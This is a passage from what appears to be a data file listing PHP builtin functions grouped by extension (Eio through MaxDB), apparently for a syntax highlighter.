'eio_fchmod',
'eio_fchown',
'eio_fdatasync',
'eio_fstat',
'eio_fstatvfs',
'eio_fsync',
'eio_ftruncate',
'eio_futime',
'eio_get_event_stream',
'eio_get_last_error',
'eio_grp_add',
'eio_grp_cancel',
'eio_grp_limit',
'eio_grp',
'eio_init',
'eio_link',
'eio_lstat',
'eio_mkdir',
'eio_mknod',
'eio_nop',
'eio_npending',
'eio_nready',
'eio_nreqs',
'eio_nthreads',
'eio_open',
'eio_poll',
'eio_read',
'eio_readahead',
'eio_readdir',
'eio_readlink',
'eio_realpath',
'eio_rename',
'eio_rmdir',
'eio_seek',
'eio_sendfile',
'eio_set_max_idle',
'eio_set_max_parallel',
'eio_set_max_poll_reqs',
'eio_set_max_poll_time',
'eio_set_min_parallel',
'eio_stat',
'eio_statvfs',
'eio_symlink',
'eio_sync_file_range',
'eio_sync',
'eio_syncfs',
'eio_truncate',
'eio_unlink',
'eio_utime',
'eio_write'],
'Enchant': ['enchant_broker_describe',
'enchant_broker_dict_exists',
'enchant_broker_free_dict',
'enchant_broker_free',
'enchant_broker_get_error',
'enchant_broker_init',
'enchant_broker_list_dicts',
'enchant_broker_request_dict',
'enchant_broker_request_pwl_dict',
'enchant_broker_set_ordering',
'enchant_dict_add_to_personal',
'enchant_dict_add_to_session',
'enchant_dict_check',
'enchant_dict_describe',
'enchant_dict_get_error',
'enchant_dict_is_in_session',
'enchant_dict_quick_check',
'enchant_dict_store_replacement',
'enchant_dict_suggest'],
'Error Handling': ['debug_backtrace',
'debug_print_backtrace',
'error_get_last',
'error_log',
'error_reporting',
'restore_error_handler',
'restore_exception_handler',
'set_error_handler',
'set_exception_handler',
'trigger_error',
'user_error'],
'Exif': ['exif_imagetype',
'exif_read_data',
'exif_tagname',
'exif_thumbnail',
'read_exif_data'],
'Expect': ['expect_expectl', 'expect_popen'],
'FAM': ['fam_cancel_monitor',
'fam_close',
'fam_monitor_collection',
'fam_monitor_directory',
'fam_monitor_file',
'fam_next_event',
'fam_open',
'fam_pending',
'fam_resume_monitor',
'fam_suspend_monitor'],
'FDF': ['fdf_add_doc_javascript',
'fdf_add_template',
'fdf_close',
'fdf_create',
'fdf_enum_values',
'fdf_errno',
'fdf_error',
'fdf_get_ap',
'fdf_get_attachment',
'fdf_get_encoding',
'fdf_get_file',
'fdf_get_flags',
'fdf_get_opt',
'fdf_get_status',
'fdf_get_value',
'fdf_get_version',
'fdf_header',
'fdf_next_field_name',
'fdf_open_string',
'fdf_open',
'fdf_remove_item',
'fdf_save_string',
'fdf_save',
'fdf_set_ap',
'fdf_set_encoding',
'fdf_set_file',
'fdf_set_flags',
'fdf_set_javascript_action',
'fdf_set_on_import_javascript',
'fdf_set_opt',
'fdf_set_status',
'fdf_set_submit_form_action',
'fdf_set_target_frame',
'fdf_set_value',
'fdf_set_version'],
'FPM': ['fastcgi_finish_request'],
'FTP': ['ftp_alloc',
'ftp_cdup',
'ftp_chdir',
'ftp_chmod',
'ftp_close',
'ftp_connect',
'ftp_delete',
'ftp_exec',
'ftp_fget',
'ftp_fput',
'ftp_get_option',
'ftp_get',
'ftp_login',
'ftp_mdtm',
'ftp_mkdir',
'ftp_nb_continue',
'ftp_nb_fget',
'ftp_nb_fput',
'ftp_nb_get',
'ftp_nb_put',
'ftp_nlist',
'ftp_pasv',
'ftp_put',
'ftp_pwd',
'ftp_quit',
'ftp_raw',
'ftp_rawlist',
'ftp_rename',
'ftp_rmdir',
'ftp_set_option',
'ftp_site',
'ftp_size',
'ftp_ssl_connect',
'ftp_systype'],
'Fann': ['fann_cascadetrain_on_data',
'fann_cascadetrain_on_file',
'fann_clear_scaling_params',
'fann_copy',
'fann_create_from_file',
'fann_create_shortcut_array',
'fann_create_shortcut',
'fann_create_sparse_array',
'fann_create_sparse',
'fann_create_standard_array',
'fann_create_standard',
'fann_create_train_from_callback',
'fann_create_train',
'fann_descale_input',
'fann_descale_output',
'fann_descale_train',
'fann_destroy_train',
'fann_destroy',
'fann_duplicate_train_data',
'fann_get_activation_function',
'fann_get_activation_steepness',
'fann_get_bias_array',
'fann_get_bit_fail_limit',
'fann_get_bit_fail',
'fann_get_cascade_activation_functions_count',
'fann_get_cascade_activation_functions',
'fann_get_cascade_activation_steepnesses_count',
'fann_get_cascade_activation_steepnesses',
'fann_get_cascade_candidate_change_fraction',
'fann_get_cascade_candidate_limit',
'fann_get_cascade_candidate_stagnation_epochs',
'fann_get_cascade_max_cand_epochs',
'fann_get_cascade_max_out_epochs',
'fann_get_cascade_min_cand_epochs',
'fann_get_cascade_min_out_epochs',
'fann_get_cascade_num_candidate_groups',
'fann_get_cascade_num_candidates',
'fann_get_cascade_output_change_fraction',
'fann_get_cascade_output_stagnation_epochs',
'fann_get_cascade_weight_multiplier',
'fann_get_connection_array',
'fann_get_connection_rate',
'fann_get_errno',
'fann_get_errstr',
'fann_get_layer_array',
'fann_get_learning_momentum',
'fann_get_learning_rate',
'fann_get_MSE',
'fann_get_network_type',
'fann_get_num_input',
'fann_get_num_layers',
'fann_get_num_output',
'fann_get_quickprop_decay',
'fann_get_quickprop_mu',
'fann_get_rprop_decrease_factor',
'fann_get_rprop_delta_max',
'fann_get_rprop_delta_min',
'fann_get_rprop_delta_zero',
'fann_get_rprop_increase_factor',
'fann_get_sarprop_step_error_shift',
'fann_get_sarprop_step_error_threshold_factor',
'fann_get_sarprop_temperature',
'fann_get_sarprop_weight_decay_shift',
'fann_get_total_connections',
'fann_get_total_neurons',
'fann_get_train_error_function',
'fann_get_train_stop_function',
'fann_get_training_algorithm',
'fann_init_weights',
'fann_length_train_data',
'fann_merge_train_data',
'fann_num_input_train_data',
'fann_num_output_train_data',
'fann_print_error',
'fann_randomize_weights',
'fann_read_train_from_file',
'fann_reset_errno',
'fann_reset_errstr',
'fann_reset_MSE',
'fann_run',
'fann_save_train',
'fann_save',
'fann_scale_input_train_data',
'fann_scale_input',
'fann_scale_output_train_data',
'fann_scale_output',
'fann_scale_train_data',
'fann_scale_train',
'fann_set_activation_function_hidden',
'fann_set_activation_function_layer',
'fann_set_activation_function_output',
'fann_set_activation_function',
'fann_set_activation_steepness_hidden',
'fann_set_activation_steepness_layer',
'fann_set_activation_steepness_output',
'fann_set_activation_steepness',
'fann_set_bit_fail_limit',
'fann_set_callback',
'fann_set_cascade_activation_functions',
'fann_set_cascade_activation_steepnesses',
'fann_set_cascade_candidate_change_fraction',
'fann_set_cascade_candidate_limit',
'fann_set_cascade_candidate_stagnation_epochs',
'fann_set_cascade_max_cand_epochs',
'fann_set_cascade_max_out_epochs',
'fann_set_cascade_min_cand_epochs',
'fann_set_cascade_min_out_epochs',
'fann_set_cascade_num_candidate_groups',
'fann_set_cascade_output_change_fraction',
'fann_set_cascade_output_stagnation_epochs',
'fann_set_cascade_weight_multiplier',
'fann_set_error_log',
'fann_set_input_scaling_params',
'fann_set_learning_momentum',
'fann_set_learning_rate',
'fann_set_output_scaling_params',
'fann_set_quickprop_decay',
'fann_set_quickprop_mu',
'fann_set_rprop_decrease_factor',
'fann_set_rprop_delta_max',
'fann_set_rprop_delta_min',
'fann_set_rprop_delta_zero',
'fann_set_rprop_increase_factor',
'fann_set_sarprop_step_error_shift',
'fann_set_sarprop_step_error_threshold_factor',
'fann_set_sarprop_temperature',
'fann_set_sarprop_weight_decay_shift',
'fann_set_scaling_params',
'fann_set_train_error_function',
'fann_set_train_stop_function',
'fann_set_training_algorithm',
'fann_set_weight_array',
'fann_set_weight',
'fann_shuffle_train_data',
'fann_subset_train_data',
'fann_test_data',
'fann_test',
'fann_train_epoch',
'fann_train_on_data',
'fann_train_on_file',
'fann_train'],
'Fileinfo': ['finfo_buffer',
'finfo_close',
'finfo_file',
'finfo_open',
'finfo_set_flags',
'mime_content_type'],
'Filesystem': ['basename',
'chgrp',
'chmod',
'chown',
'clearstatcache',
'copy',
'dirname',
'disk_free_space',
'disk_total_space',
'diskfreespace',
'fclose',
'feof',
'fflush',
'fgetc',
'fgetcsv',
'fgets',
'fgetss',
'file_exists',
'file_get_contents',
'file_put_contents',
'file',
'fileatime',
'filectime',
'filegroup',
'fileinode',
'filemtime',
'fileowner',
'fileperms',
'filesize',
'filetype',
'flock',
'fnmatch',
'fopen',
'fpassthru',
'fputcsv',
'fputs',
'fread',
'fscanf',
'fseek',
'fstat',
'ftell',
'ftruncate',
'fwrite',
'glob',
'is_dir',
'is_executable',
'is_file',
'is_link',
'is_readable',
'is_uploaded_file',
'is_writable',
'is_writeable',
'lchgrp',
'lchown',
'link',
'linkinfo',
'lstat',
'mkdir',
'move_uploaded_file',
'parse_ini_file',
'parse_ini_string',
'pathinfo',
'pclose',
'popen',
'readfile',
'readlink',
'realpath_cache_get',
'realpath_cache_size',
'realpath',
'rename',
'rewind',
'rmdir',
'set_file_buffer',
'stat',
'symlink',
'tempnam',
'tmpfile',
'touch',
'umask',
'unlink'],
'Filter': ['filter_has_var',
'filter_id',
'filter_input_array',
'filter_input',
'filter_list',
'filter_var_array',
'filter_var'],
'Firebird/InterBase': ['ibase_add_user',
'ibase_affected_rows',
'ibase_backup',
'ibase_blob_add',
'ibase_blob_cancel',
'ibase_blob_close',
'ibase_blob_create',
'ibase_blob_echo',
'ibase_blob_get',
'ibase_blob_import',
'ibase_blob_info',
'ibase_blob_open',
'ibase_close',
'ibase_commit_ret',
'ibase_commit',
'ibase_connect',
'ibase_db_info',
'ibase_delete_user',
'ibase_drop_db',
'ibase_errcode',
'ibase_errmsg',
'ibase_execute',
'ibase_fetch_assoc',
'ibase_fetch_object',
'ibase_fetch_row',
'ibase_field_info',
'ibase_free_event_handler',
'ibase_free_query',
'ibase_free_result',
'ibase_gen_id',
'ibase_maintain_db',
'ibase_modify_user',
'ibase_name_result',
'ibase_num_fields',
'ibase_num_params',
'ibase_param_info',
'ibase_pconnect',
'ibase_prepare',
'ibase_query',
'ibase_restore',
'ibase_rollback_ret',
'ibase_rollback',
'ibase_server_info',
'ibase_service_attach',
'ibase_service_detach',
'ibase_set_event_handler',
'ibase_trans',
'ibase_wait_event'],
'FriBiDi': ['fribidi_log2vis'],
'FrontBase': ['fbsql_affected_rows',
'fbsql_autocommit',
'fbsql_blob_size',
'fbsql_change_user',
'fbsql_clob_size',
'fbsql_close',
'fbsql_commit',
'fbsql_connect',
'fbsql_create_blob',
'fbsql_create_clob',
'fbsql_create_db',
'fbsql_data_seek',
'fbsql_database_password',
'fbsql_database',
'fbsql_db_query',
'fbsql_db_status',
'fbsql_drop_db',
'fbsql_errno',
'fbsql_error',
'fbsql_fetch_array',
'fbsql_fetch_assoc',
'fbsql_fetch_field',
'fbsql_fetch_lengths',
'fbsql_fetch_object',
'fbsql_fetch_row',
'fbsql_field_flags',
'fbsql_field_len',
'fbsql_field_name',
'fbsql_field_seek',
'fbsql_field_table',
'fbsql_field_type',
'fbsql_free_result',
'fbsql_get_autostart_info',
'fbsql_hostname',
'fbsql_insert_id',
'fbsql_list_dbs',
'fbsql_list_fields',
'fbsql_list_tables',
'fbsql_next_result',
'fbsql_num_fields',
'fbsql_num_rows',
'fbsql_password',
'fbsql_pconnect',
'fbsql_query',
'fbsql_read_blob',
'fbsql_read_clob',
'fbsql_result',
'fbsql_rollback',
'fbsql_rows_fetched',
'fbsql_select_db',
'fbsql_set_characterset',
'fbsql_set_lob_mode',
'fbsql_set_password',
'fbsql_set_transaction',
'fbsql_start_db',
'fbsql_stop_db',
'fbsql_table_name',
'fbsql_tablename',
'fbsql_username',
'fbsql_warnings'],
'Function handling': ['call_user_func_array',
'call_user_func',
'create_function',
'forward_static_call_array',
'forward_static_call',
'func_get_arg',
'func_get_args',
'func_num_args',
'function_exists',
'get_defined_functions',
'register_shutdown_function',
'register_tick_function',
'unregister_tick_function'],
'GD and Image': ['gd_info',
'getimagesize',
'getimagesizefromstring',
'image_type_to_extension',
'image_type_to_mime_type',
'image2wbmp',
'imageaffine',
'imageaffinematrixconcat',
'imageaffinematrixget',
'imagealphablending',
'imageantialias',
'imagearc',
'imagechar',
'imagecharup',
'imagecolorallocate',
'imagecolorallocatealpha',
'imagecolorat',
'imagecolorclosest',
'imagecolorclosestalpha',
'imagecolorclosesthwb',
'imagecolordeallocate',
'imagecolorexact',
'imagecolorexactalpha',
'imagecolormatch',
'imagecolorresolve',
'imagecolorresolvealpha',
'imagecolorset',
'imagecolorsforindex',
'imagecolorstotal',
'imagecolortransparent',
'imageconvolution',
'imagecopy',
'imagecopymerge',
'imagecopymergegray',
'imagecopyresampled',
'imagecopyresized',
'imagecreate',
'imagecreatefromgd2',
'imagecreatefromgd2part',
'imagecreatefromgd',
'imagecreatefromgif',
'imagecreatefromjpeg',
'imagecreatefrompng',
'imagecreatefromstring',
'imagecreatefromwbmp',
'imagecreatefromwebp',
'imagecreatefromxbm',
'imagecreatefromxpm',
'imagecreatetruecolor',
'imagecrop',
'imagecropauto',
'imagedashedline',
'imagedestroy',
'imageellipse',
'imagefill',
'imagefilledarc',
'imagefilledellipse',
'imagefilledpolygon',
'imagefilledrectangle',
'imagefilltoborder',
'imagefilter',
'imageflip',
'imagefontheight',
'imagefontwidth',
'imageftbbox',
'imagefttext',
'imagegammacorrect',
'imagegd2',
'imagegd',
'imagegif',
'imagegrabscreen',
'imagegrabwindow',
'imageinterlace',
'imageistruecolor',
'imagejpeg',
'imagelayereffect',
'imageline',
'imageloadfont',
'imagepalettecopy',
'imagepalettetotruecolor',
'imagepng',
'imagepolygon',
'imagepsbbox',
'imagepsencodefont',
'imagepsextendfont',
'imagepsfreefont',
'imagepsloadfont',
'imagepsslantfont',
'imagepstext',
'imagerectangle',
'imagerotate',
'imagesavealpha',
'imagescale',
'imagesetbrush',
'imagesetinterpolation',
'imagesetpixel',
'imagesetstyle',
'imagesetthickness',
'imagesettile',
'imagestring',
'imagestringup',
'imagesx',
'imagesy',
'imagetruecolortopalette',
'imagettfbbox',
'imagettftext',
'imagetypes',
'imagewbmp',
'imagewebp',
'imagexbm',
'iptcembed',
'iptcparse',
'jpeg2wbmp',
'png2wbmp'],
'GMP': ['gmp_abs',
'gmp_add',
'gmp_and',
'gmp_clrbit',
'gmp_cmp',
'gmp_com',
'gmp_div_q',
'gmp_div_qr',
'gmp_div_r',
'gmp_div',
'gmp_divexact',
'gmp_fact',
'gmp_gcd',
'gmp_gcdext',
'gmp_hamdist',
'gmp_init',
'gmp_intval',
'gmp_invert',
'gmp_jacobi',
'gmp_legendre',
'gmp_mod',
'gmp_mul',
'gmp_neg',
'gmp_nextprime',
'gmp_or',
'gmp_perfect_square',
'gmp_popcount',
'gmp_pow',
'gmp_powm',
'gmp_prob_prime',
'gmp_random',
'gmp_scan0',
'gmp_scan1',
'gmp_setbit',
'gmp_sign',
'gmp_sqrt',
'gmp_sqrtrem',
'gmp_strval',
'gmp_sub',
'gmp_testbit',
'gmp_xor'],
'GeoIP': ['geoip_asnum_by_name',
'geoip_continent_code_by_name',
'geoip_country_code_by_name',
'geoip_country_code3_by_name',
'geoip_country_name_by_name',
'geoip_database_info',
'geoip_db_avail',
'geoip_db_filename',
'geoip_db_get_all_info',
'geoip_domain_by_name',
'geoip_id_by_name',
'geoip_isp_by_name',
'geoip_netspeedcell_by_name',
'geoip_org_by_name',
'geoip_record_by_name',
'geoip_region_by_name',
'geoip_region_name_by_code',
'geoip_setup_custom_directory',
'geoip_time_zone_by_country_and_region'],
'Gettext': ['bind_textdomain_codeset',
'bindtextdomain',
'dcgettext',
'dcngettext',
'dgettext',
'dngettext',
'gettext',
'ngettext',
'textdomain'],
'GnuPG': ['gnupg_adddecryptkey',
'gnupg_addencryptkey',
'gnupg_addsignkey',
'gnupg_cleardecryptkeys',
'gnupg_clearencryptkeys',
'gnupg_clearsignkeys',
'gnupg_decrypt',
'gnupg_decryptverify',
'gnupg_encrypt',
'gnupg_encryptsign',
'gnupg_export',
'gnupg_geterror',
'gnupg_getprotocol',
'gnupg_import',
'gnupg_init',
'gnupg_keyinfo',
'gnupg_setarmor',
'gnupg_seterrormode',
'gnupg_setsignmode',
'gnupg_sign',
'gnupg_verify'],
'Gopher': ['gopher_parsedir'],
'Grapheme': ['grapheme_extract',
'grapheme_stripos',
'grapheme_stristr',
'grapheme_strlen',
'grapheme_strpos',
'grapheme_strripos',
'grapheme_strrpos',
'grapheme_strstr',
'grapheme_substr'],
'Gupnp': ['gupnp_context_get_host_ip',
'gupnp_context_get_port',
'gupnp_context_get_subscription_timeout',
'gupnp_context_host_path',
'gupnp_context_new',
'gupnp_context_set_subscription_timeout',
'gupnp_context_timeout_add',
'gupnp_context_unhost_path',
'gupnp_control_point_browse_start',
'gupnp_control_point_browse_stop',
'gupnp_control_point_callback_set',
'gupnp_control_point_new',
'gupnp_device_action_callback_set',
'gupnp_device_info_get_service',
'gupnp_device_info_get',
'gupnp_root_device_get_available',
'gupnp_root_device_get_relative_location',
'gupnp_root_device_new',
'gupnp_root_device_set_available',
'gupnp_root_device_start',
'gupnp_root_device_stop',
'gupnp_service_action_get',
'gupnp_service_action_return_error',
'gupnp_service_action_return',
'gupnp_service_action_set',
'gupnp_service_freeze_notify',
'gupnp_service_info_get_introspection',
'gupnp_service_info_get',
'gupnp_service_introspection_get_state_variable',
'gupnp_service_notify',
'gupnp_service_proxy_action_get',
'gupnp_service_proxy_action_set',
'gupnp_service_proxy_add_notify',
'gupnp_service_proxy_callback_set',
'gupnp_service_proxy_get_subscribed',
'gupnp_service_proxy_remove_notify',
'gupnp_service_proxy_set_subscribed',
'gupnp_service_thaw_notify'],
'HTTP': ['http_cache_etag',
'http_cache_last_modified',
'http_chunked_decode',
'http_deflate',
'http_inflate',
'http_build_cookie',
'http_date',
'http_get_request_body_stream',
'http_get_request_body',
'http_get_request_headers',
'http_match_etag',
'http_match_modified',
'http_match_request_header',
'http_support',
'http_negotiate_charset',
'http_negotiate_content_type',
'http_negotiate_language',
'ob_deflatehandler',
'ob_etaghandler',
'ob_inflatehandler',
'http_parse_cookie',
'http_parse_headers',
'http_parse_message',
'http_parse_params',
'http_persistent_handles_clean',
'http_persistent_handles_count',
'http_persistent_handles_ident',
'http_get',
'http_head',
'http_post_data',
'http_post_fields',
'http_put_data',
'http_put_file',
'http_put_stream',
'http_request_body_encode',
'http_request_method_exists',
'http_request_method_name',
'http_request_method_register',
'http_request_method_unregister',
'http_request',
'http_redirect',
'http_send_content_disposition',
'http_send_content_type',
'http_send_data',
'http_send_file',
'http_send_last_modified',
'http_send_status',
'http_send_stream',
'http_throttle',
'http_build_str',
'http_build_url'],
'Hash': ['hash_algos',
'hash_copy',
'hash_file',
'hash_final',
'hash_hmac_file',
'hash_hmac',
'hash_init',
'hash_pbkdf2',
'hash_update_file',
'hash_update_stream',
'hash_update',
'hash'],
'Hyperwave': ['hw_Array2Objrec',
'hw_changeobject',
'hw_Children',
'hw_ChildrenObj',
'hw_Close',
'hw_Connect',
'hw_connection_info',
'hw_cp',
'hw_Deleteobject',
'hw_DocByAnchor',
'hw_DocByAnchorObj',
'hw_Document_Attributes',
'hw_Document_BodyTag',
'hw_Document_Content',
'hw_Document_SetContent',
'hw_Document_Size',
'hw_dummy',
'hw_EditText',
'hw_Error',
'hw_ErrorMsg',
'hw_Free_Document',
'hw_GetAnchors',
'hw_GetAnchorsObj',
'hw_GetAndLock',
'hw_GetChildColl',
'hw_GetChildCollObj',
'hw_GetChildDocColl',
'hw_GetChildDocCollObj',
'hw_GetObject',
'hw_GetObjectByQuery',
'hw_GetObjectByQueryColl',
'hw_GetObjectByQueryCollObj',
'hw_GetObjectByQueryObj',
'hw_GetParents',
'hw_GetParentsObj',
'hw_getrellink',
'hw_GetRemote',
'hw_getremotechildren',
'hw_GetSrcByDestObj',
'hw_GetText',
'hw_getusername',
'hw_Identify',
'hw_InCollections',
'hw_Info',
'hw_InsColl',
'hw_InsDoc',
'hw_insertanchors',
'hw_InsertDocument',
'hw_InsertObject',
'hw_mapid',
'hw_Modifyobject',
'hw_mv',
'hw_New_Document',
'hw_objrec2array',
'hw_Output_Document',
'hw_pConnect',
'hw_PipeDocument',
'hw_Root',
'hw_setlinkroot',
'hw_stat',
'hw_Unlock',
'hw_Who'],
'Hyperwave API': ['hwapi_attribute_new',
'hwapi_content_new',
'hwapi_hgcsp',
'hwapi_object_new'],
'IBM DB2': ['db2_autocommit',
'db2_bind_param',
'db2_client_info',
'db2_close',
'db2_column_privileges',
'db2_columns',
'db2_commit',
'db2_conn_error',
'db2_conn_errormsg',
'db2_connect',
'db2_cursor_type',
'db2_escape_string',
'db2_exec',
'db2_execute',
'db2_fetch_array',
'db2_fetch_assoc',
'db2_fetch_both',
'db2_fetch_object',
'db2_fetch_row',
'db2_field_display_size',
'db2_field_name',
'db2_field_num',
'db2_field_precision',
'db2_field_scale',
'db2_field_type',
'db2_field_width',
'db2_foreign_keys',
'db2_free_result',
'db2_free_stmt',
'db2_get_option',
'db2_last_insert_id',
'db2_lob_read',
'db2_next_result',
'db2_num_fields',
'db2_num_rows',
'db2_pclose',
'db2_pconnect',
'db2_prepare',
'db2_primary_keys',
'db2_procedure_columns',
'db2_procedures',
'db2_result',
'db2_rollback',
'db2_server_info',
'db2_set_option',
'db2_special_columns',
'db2_statistics',
'db2_stmt_error',
'db2_stmt_errormsg',
'db2_table_privileges',
'db2_tables'],
'ID3': ['id3_get_frame_long_name',
'id3_get_frame_short_name',
'id3_get_genre_id',
'id3_get_genre_list',
'id3_get_genre_name',
'id3_get_tag',
'id3_get_version',
'id3_remove_tag',
'id3_set_tag'],
'IDN': ['grapheme_substr', 'idn_to_ascii', 'idn_to_unicode', 'idn_to_utf8'],
'IIS': ['iis_add_server',
'iis_get_dir_security',
'iis_get_script_map',
'iis_get_server_by_comment',
'iis_get_server_by_path',
'iis_get_server_rights',
'iis_get_service_state',
'iis_remove_server',
'iis_set_app_settings',
'iis_set_dir_security',
'iis_set_script_map',
'iis_set_server_rights',
'iis_start_server',
'iis_start_service',
'iis_stop_server',
'iis_stop_service'],
'IMAP': ['imap_8bit',
'imap_alerts',
'imap_append',
'imap_base64',
'imap_binary',
'imap_body',
'imap_bodystruct',
'imap_check',
'imap_clearflag_full',
'imap_close',
'imap_create',
'imap_createmailbox',
'imap_delete',
'imap_deletemailbox',
'imap_errors',
'imap_expunge',
'imap_fetch_overview',
'imap_fetchbody',
'imap_fetchheader',
'imap_fetchmime',
'imap_fetchstructure',
'imap_fetchtext',
'imap_gc',
'imap_get_quota',
'imap_get_quotaroot',
'imap_getacl',
'imap_getmailboxes',
'imap_getsubscribed',
'imap_header',
'imap_headerinfo',
'imap_headers',
'imap_last_error',
'imap_list',
'imap_listmailbox',
'imap_listscan',
'imap_listsubscribed',
'imap_lsub',
'imap_mail_compose',
'imap_mail_copy',
'imap_mail_move',
'imap_mail',
'imap_mailboxmsginfo',
'imap_mime_header_decode',
'imap_msgno',
'imap_num_msg',
'imap_num_recent',
'imap_open',
'imap_ping',
'imap_qprint',
'imap_rename',
'imap_renamemailbox',
'imap_reopen',
'imap_rfc822_parse_adrlist',
'imap_rfc822_parse_headers',
'imap_rfc822_write_address',
'imap_savebody',
'imap_scan',
'imap_scanmailbox',
'imap_search',
'imap_set_quota',
'imap_setacl',
'imap_setflag_full',
'imap_sort',
'imap_status',
'imap_subscribe',
'imap_thread',
'imap_timeout',
'imap_uid',
'imap_undelete',
'imap_unsubscribe',
'imap_utf7_decode',
'imap_utf7_encode',
'imap_utf8'],
'Informix': ['ifx_affected_rows',
'ifx_blobinfile_mode',
'ifx_byteasvarchar',
'ifx_close',
'ifx_connect',
'ifx_copy_blob',
'ifx_create_blob',
'ifx_create_char',
'ifx_do',
'ifx_error',
'ifx_errormsg',
'ifx_fetch_row',
'ifx_fieldproperties',
'ifx_fieldtypes',
'ifx_free_blob',
'ifx_free_char',
'ifx_free_result',
'ifx_get_blob',
'ifx_get_char',
'ifx_getsqlca',
'ifx_htmltbl_result',
'ifx_nullformat',
'ifx_num_fields',
'ifx_num_rows',
'ifx_pconnect',
'ifx_prepare',
'ifx_query',
'ifx_textasvarchar',
'ifx_update_blob',
'ifx_update_char',
'ifxus_close_slob',
'ifxus_create_slob',
'ifxus_free_slob',
'ifxus_open_slob',
'ifxus_read_slob',
'ifxus_seek_slob',
'ifxus_tell_slob',
'ifxus_write_slob'],
'Ingres': ['ingres_autocommit_state',
'ingres_autocommit',
'ingres_charset',
'ingres_close',
'ingres_commit',
'ingres_connect',
'ingres_cursor',
'ingres_errno',
'ingres_error',
'ingres_errsqlstate',
'ingres_escape_string',
'ingres_execute',
'ingres_fetch_array',
'ingres_fetch_assoc',
'ingres_fetch_object',
'ingres_fetch_proc_return',
'ingres_fetch_row',
'ingres_field_length',
'ingres_field_name',
'ingres_field_nullable',
'ingres_field_precision',
'ingres_field_scale',
'ingres_field_type',
'ingres_free_result',
'ingres_next_error',
'ingres_num_fields',
'ingres_num_rows',
'ingres_pconnect',
'ingres_prepare',
'ingres_query',
'ingres_result_seek',
'ingres_rollback',
'ingres_set_environment',
'ingres_unbuffered_query'],
'Inotify': ['inotify_add_watch',
'inotify_init',
'inotify_queue_len',
'inotify_read',
'inotify_rm_watch'],
'JSON': ['json_decode',
'json_encode',
'json_last_error_msg',
'json_last_error'],
'Java': ['java_last_exception_clear', 'java_last_exception_get'],
'Judy': ['judy_type', 'judy_version'],
'KADM5': ['kadm5_chpass_principal',
'kadm5_create_principal',
'kadm5_delete_principal',
'kadm5_destroy',
'kadm5_flush',
'kadm5_get_policies',
'kadm5_get_principal',
'kadm5_get_principals',
'kadm5_init_with_password',
'kadm5_modify_principal'],
'LDAP': ['ldap_8859_to_t61',
'ldap_add',
'ldap_bind',
'ldap_close',
'ldap_compare',
'ldap_connect',
'ldap_control_paged_result_response',
'ldap_control_paged_result',
'ldap_count_entries',
'ldap_delete',
'ldap_dn2ufn',
'ldap_err2str',
'ldap_errno',
'ldap_error',
'ldap_explode_dn',
'ldap_first_attribute',
'ldap_first_entry',
'ldap_first_reference',
'ldap_free_result',
'ldap_get_attributes',
'ldap_get_dn',
'ldap_get_entries',
'ldap_get_option',
'ldap_get_values_len',
'ldap_get_values',
'ldap_list',
'ldap_mod_add',
'ldap_mod_del',
'ldap_mod_replace',
'ldap_modify',
'ldap_next_attribute',
'ldap_next_entry',
'ldap_next_reference',
'ldap_parse_reference',
'ldap_parse_result',
'ldap_read',
'ldap_rename',
'ldap_sasl_bind',
'ldap_search',
'ldap_set_option',
'ldap_set_rebind_proc',
'ldap_sort',
'ldap_start_tls',
'ldap_t61_to_8859',
'ldap_unbind'],
'LZF': ['lzf_compress', 'lzf_decompress', 'lzf_optimized_for'],
'Libevent': ['event_add',
'event_base_free',
'event_base_loop',
'event_base_loopbreak',
'event_base_loopexit',
'event_base_new',
'event_base_priority_init',
'event_base_set',
'event_buffer_base_set',
'event_buffer_disable',
'event_buffer_enable',
'event_buffer_fd_set',
'event_buffer_free',
'event_buffer_new',
'event_buffer_priority_set',
'event_buffer_read',
'event_buffer_set_callback',
'event_buffer_timeout_set',
'event_buffer_watermark_set',
'event_buffer_write',
'event_del',
'event_free',
'event_new',
'event_set'],
'Lotus Notes': ['notes_body',
'notes_copy_db',
'notes_create_db',
'notes_create_note',
'notes_drop_db',
'notes_find_note',
'notes_header_info',
'notes_list_msgs',
'notes_mark_read',
'notes_mark_unread',
'notes_nav_create',
'notes_search',
'notes_unread',
'notes_version'],
'MCVE': ['m_checkstatus',
'm_completeauthorizations',
'm_connect',
'm_connectionerror',
'm_deletetrans',
'm_destroyconn',
'm_destroyengine',
'm_getcell',
'm_getcellbynum',
'm_getcommadelimited',
'm_getheader',
'm_initconn',
'm_initengine',
'm_iscommadelimited',
'm_maxconntimeout',
'm_monitor',
'm_numcolumns',
'm_numrows',
'm_parsecommadelimited',
'm_responsekeys',
'm_responseparam',
'm_returnstatus',
'm_setblocking',
'm_setdropfile',
'm_setip',
'm_setssl_cafile',
'm_setssl_files',
'm_setssl',
'm_settimeout',
'm_sslcert_gen_hash',
'm_transactionssent',
'm_transinqueue',
'm_transkeyval',
'm_transnew',
'm_transsend',
'm_uwait',
'm_validateidentifier',
'm_verifyconnection',
'm_verifysslcert'],
'Mail': ['ezmlm_hash', 'mail'],
'Mailparse': ['mailparse_determine_best_xfer_encoding',
'mailparse_msg_create',
'mailparse_msg_extract_part_file',
'mailparse_msg_extract_part',
'mailparse_msg_extract_whole_part_file',
'mailparse_msg_free',
'mailparse_msg_get_part_data',
'mailparse_msg_get_part',
'mailparse_msg_get_structure',
'mailparse_msg_parse_file',
'mailparse_msg_parse',
'mailparse_rfc822_parse_addresses',
'mailparse_stream_encode',
'mailparse_uudecode_all'],
'Math': ['abs',
'acos',
'acosh',
'asin',
'asinh',
'atan2',
'atan',
'atanh',
'base_convert',
'bindec',
'ceil',
'cos',
'cosh',
'decbin',
'dechex',
'decoct',
'deg2rad',
'exp',
'expm1',
'floor',
'fmod',
'getrandmax',
'hexdec',
'hypot',
'is_finite',
'is_infinite',
'is_nan',
'lcg_value',
'log10',
'log1p',
'log',
'max',
'min',
'mt_getrandmax',
'mt_rand',
'mt_srand',
'octdec',
'pi',
'pow',
'rad2deg',
'rand',
'round',
'sin',
'sinh',
'sqrt',
'srand',
'tan',
'tanh'],
'MaxDB': ['maxdb_affected_rows',
'maxdb_autocommit',
'maxdb_bind_param',
'maxdb_bind_result',
'maxdb_change_user',
'maxdb_character_set_name',
'maxdb_client_encoding',
'maxdb_close_long_data',
'maxdb_close',
'maxdb_commit',
'maxdb_connect_errno',
'maxdb_connect_error',
'maxdb_connect',
'maxdb_data_seek',
'maxdb_debug',
'maxdb_disable_reads_from_master',
'maxdb_disable_rpl_parse',
'maxdb_dump_debug_info',
'maxdb_embedded_connect',
'maxdb_enable_reads_from_master',
